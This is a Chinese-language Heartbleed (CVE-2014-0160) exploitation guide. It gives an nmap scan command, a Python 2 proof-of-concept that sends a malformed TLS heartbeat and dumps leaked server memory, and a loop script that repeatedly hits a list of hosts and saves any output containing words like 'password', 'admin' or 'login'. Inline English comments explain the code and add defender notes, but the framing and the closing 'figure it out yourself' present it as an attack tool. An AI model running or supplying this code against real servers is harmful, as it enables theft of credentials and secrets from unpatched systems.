一、开始扫描

工具 CSHeartbleedScanner
  1. nmap -p 443,465,563,636,990,993,995,3306,5432 --script ssl-heartbleed <target>

二、获取目标服务器内存数据poc

  1. #!/usr/bin/python
  2. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  3. # The author disclaims copyright to this source code.
  4. import sys
  5. import struct
  6. import socket
  7. import time
  8. import select
  9. import re
  10. from optparse import OptionParser
  # Command-line interface: one positional argument (the host) plus -p/--port, default 443.
  # The usage text itself announces the purpose: a check for CVE-2014-0160 (Heartbleed).
  # NOTE(review): the listing as pasted carries inline line numbers and has lost all
  # indentation, so it is not runnable in this form; it is also Python 2 code (print statements).
  11. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  12. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  # Turn a whitespace-separated hex dump (spaces and newlines are stripped) into raw bytes.
  # Uses the Python 2 str.decode('hex') codec; the input is the hard-coded literals below,
  # never external data.
  13. def h2bin(x):
  14. return x.replace(' ', '').replace('\n', '').decode('hex')
  # Two hard-coded TLS records, version bytes 03 02 (TLS 1.1), assembled as raw bytes:
  #   hello - a handshake record (content type 0x16) carrying a ClientHello;
  #   hb    - a heartbeat record (content type 0x18, record length 3) whose reply is
  #           inspected in hit_hb (type 24 == 0x18).
  # Defender note: a heartbeat record sent before the handshake has finished, with a
  # declared heartbeat payload length larger than the bytes actually on the wire, is
  # exactly what the public IDS signatures for CVE-2014-0160 match on. Servers running
  # OpenSSL 1.0.1g or later, or built with heartbeats disabled, do not leak on this input.
  15. hello = h2bin('''
  16. 16 03 02 00 dc 01 00 00 d8 03 02 53
  17. 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
  18. bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
  19. 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
  20. 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
  21. c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
  22. c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
  23. c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
  24. c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
  25. 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
  26. 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
  27. 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
  28. 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
  29. 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
  30. 00 0f 00 01 01
  31. ''')
  32. hb = h2bin('''
  33. 18 03 02 00 03
  34. 01 40 00
  35. ''')
  # Print the printable-ASCII view of `s`: bytes 32..126 are kept, everything else becomes
  # '.', walked 16 bytes at a time, and runs of six dots are collapsed before printing.
  # Because indentation was lost in the paste, it is unclear whether the print runs once
  # per 16-byte row or once after the loop; `pdat` accumulates across rows either way.
  # This is the routine that renders leaked server memory in hit_hb, so the console
  # output of this script (and anything that captures it) must be treated as sensitive.
  36. def hexdump(s):
  37. pdat = ''
  38. for b in xrange(0, len(s), 16):
  39. lin = [c for c in s[b : b + 16]]
  40. pdat += ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  41. print '%s' % (pdat.replace('......', ''),)
  42. print
  # Read exactly `length` bytes from socket `s`, or return None on overall timeout or EOF.
  # The deadline is checked before each read, but select() waits a fixed 5 seconds rather
  # than the remaining `rtime`, so one call can overrun `timeout` by up to 5 s. The socket
  # itself is blocking; recv() is only attempted once select() reports it readable.
  43. def recvall(s, length, timeout=5):
  44. endtime = time.time() + timeout
  45. rdata = ''
  46. remain = length
  47. while remain > 0:
  48. rtime = endtime - time.time()
  49. if rtime < 0:
  50. return None
  51. r, w, e = select.select([s], [], [], 5)
  52. if s in r:
  53. data = s.recv(remain)
  54. # EOF?
  55. if not data:
  56. return None
  57. rdata += data
  58. remain -= len(data)
  59. return rdata
  # Read one TLS record from `s`: the 5-byte header ('>BHH' = content type, version,
  # length) followed by `ln` payload bytes (10 s timeout for the payload).
  # Returns (type, version, payload), or (None, None, None) if the peer closed the
  # connection at either stage. The length field is taken from the remote peer unverified;
  # being a 16-bit field it is bounded at 65535 bytes, and the payload timeout bounds the wait.
  60. def recvmsg(s):
  61. hdr = recvall(s, 5)
  62. if hdr is None:
  63. print 'Unexpected EOF receiving record header - server closed connection'
  64. return None, None, None
  65. typ, ver, ln = struct.unpack('>BHH', hdr)
  66. pay = recvall(s, ln, 10)
  67. if pay is None:
  68. print 'Unexpected EOF receiving record payload - server closed connection'
  69. return None, None, None
  70. print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  71. return typ, ver, pay
  # Send the heartbeat record and classify the server's answer:
  #   type 24 (heartbeat response): the request record carried a 3-byte payload, so a
  #     response payload longer than 3 bytes means the server returned memory it should
  #     not have -> reported as vulnerable; exactly 3 or fewer -> processed but no leak.
  #   type 21 (alert): the server rejected the record -> reported as likely not vulnerable.
  #   anything else is ignored and the loop reads the next record; the loop only ends
  #   when recvmsg returns None (timeout/EOF), which is reported as "not vulnerable".
  # Returns True only on a heartbeat response, whether or not extra data came back.
  # Mitigation on the server side is OpenSSL 1.0.1g or later (or heartbeats compiled out).
  72. def hit_hb(s):
  73. s.send(hb)
  74. while True:
  75. typ, ver, pay = recvmsg(s)
  76. if typ is None:
  77. print 'No heartbeat response received, server likely not vulnerable'
  78. return False
  79. if typ == 24:
  80. print 'Received heartbeat response:'
  81. hexdump(pay)
  82. if len(pay) > 3:
  83. print 'WARNING: server returned more data than it should - server is vulnerable!'
  84. else:
  85. print 'Server processed malformed heartbeat, but did not return any extra data.'
  86. return True
  87. if typ == 21:
  88. print 'Received alert:'
  89. hexdump(pay)
  90. print 'Server returned error, likely not vulnerable'
  91. return False
  # Entry point. Parses the CLI, opens a plain TCP socket to (host, port), sends the raw
  # ClientHello, then reads records until a handshake record (type 22) whose first byte is
  # 0x0E (ServerHelloDone) arrives, and finally sends the heartbeat. No TLS library is
  # involved and no key exchange is ever sent, so from the server's side this presumably
  # looks like a handshake that never completes - a useful thing to look for in TLS logs.
  # Note the heartbeat record is sent here (line 116) and again inside hit_hb, so each run
  # emits two heartbeat requests. The socket is never closed explicitly, and `typ == None`
  # should idiomatically be `typ is None` (behaviour is the same here).
  92. def main():
  93. opts, args = options.parse_args()
  94. if len(args) < 1:
  95. options.print_help()
  96. return
  97. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  98. print 'Connecting...'
  99. sys.stdout.flush()
  100. s.connect((args[0], opts.port))
  101. print 'Sending Client Hello...'
  102. sys.stdout.flush()
  103. s.send(hello)
  104. print 'Waiting for Server Hello...'
  105. sys.stdout.flush()
  106. while True:
  107. typ, ver, pay = recvmsg(s)
  108. if typ == None:
  109. print 'Server closed connection without sending Server Hello.'
  110. return
  111. # Look for server hello done message.
  112. if typ == 22 and ord(pay[0]) == 0x0E:
  113. break
  114. print 'Sending heartbeat request...'
  115. sys.stdout.flush()
  116. s.send(hb)
  117. hit_hb(s)
  # Script guard: only run when executed directly (the loop script below invokes it this way).
  118. if __name__ == '__main__':
  119. main()

三、不间断获取服务器内存信息

配合上面的代码
  # Driver loop around the PoC above (saved as ssltest.py). Reads hosts from ips.txt, one
  # per line (only the first whitespace-separated field of each line is used), then forever:
  # for every host, runs `python ssltest.py <host>` through a shell via os.popen, and if the
  # captured output contains any of the credential-like keywords, appends the whole output
  # to data\<timestamp>.txt (Windows path separator, colons stripped from the timestamp).
  # The command line is built by string formatting from file contents, so the contents of
  # ips.txt are passed to the shell unescaped. `re` is imported but never used.
  # Incident-response view: the on-disk artifacts of this tooling are ips.txt and a data\
  # directory of timestamped text dumps; on the network it is a ClientHello followed by
  # heartbeat records to every listed host, repeated about once per second, indefinitely.
  1. import os
  2. import re
  3. import time
  4. f= open('ips.txt','r')
  5. ips= []
  6. for ip in f.readlines():
  7. ips.append(ip.split())
  8. f.close()
  9. while True:
  10. for i in ips:
  11. cmd = 'python ssltest.py %s'% str(i[0])
  12. result = os.popen(cmd).read()
  13. keywords = ['system', 'password', 'passwd', 'admin','username','login','pass','user']
  14. for word in keywords:
  15. if result.find(word) > 0:
  16. print 'new data', time.asctime()
  17. with open('data\\' + time.asctime().replace(':', ' ') + '.txt', 'a') as f:
  18. f.write(result)
  19. break
  20. time.sleep(1.0)
最后，具体怎么操作？自己领会吧。
